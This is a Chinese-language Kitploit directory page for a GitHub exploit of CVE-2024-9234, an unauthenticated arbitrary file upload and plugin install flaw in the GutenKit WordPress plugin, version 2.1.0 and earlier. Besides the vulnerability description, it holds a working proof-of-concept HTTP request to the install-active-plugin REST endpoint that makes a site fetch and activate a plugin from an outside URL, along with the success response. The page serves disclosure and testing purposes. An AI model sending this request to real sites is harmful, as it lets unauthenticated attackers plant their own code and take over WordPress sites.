Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-9234 — GutenKit <= 2.1.0 - 未认证任意文件上传 | Kitploit
工具/GitHubGitHub/randomrobbiebf/cve-2024-9234
漏洞分析漏洞利用Web应用程序漏洞利用Web安全渗透测试
GitHubrandomrobbiebf/cve-2024-9234

CVE-2024-9234

GutenKit <= 2.1.0 - 未认证任意文件上传

查看仓库
21年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2024-9234

GutenKit <= 2.1.0 - 未认证的任意文件上传

描述

GutenKit——Gutenberg块编辑器的页面构建器块、模式和模板插件,由于在 install_and_activate_plugin_from_external() 函数(install-active-plugin REST API 端点)中缺少权限检查,在包括2.1.0版本内的所有版本中均存在任意文件上传漏洞。这使得未经身份验证的攻击者可以安装和激活任意插件,或者利用该功能上传伪装成插件的任意文件。

root@kitploit:~
Type: plugin
CVSS Score: 9.8
CVE: CVE-2024-9234
Slug: gutenkit-blocks-addon

下载链接:下载 gutenkit-blocks-addon 版本 2.1.0

POC

root@kitploit:~
POST /wp-json/gutenkit/v1/install-active-plugin HTTP/2
Host: wpscan-vulnerability-test-bench.ddev.site
Content-Type: application/json
Content-Length: 114

{
  "plugin": "https://downloads.wordpress.org/plugin/popularis-extra.1.2.6.zip",
  "slug": "popularis-extra"
}
root@kitploit:~
{"success":true,"data":"Plugin installed successfully!"}
下载工具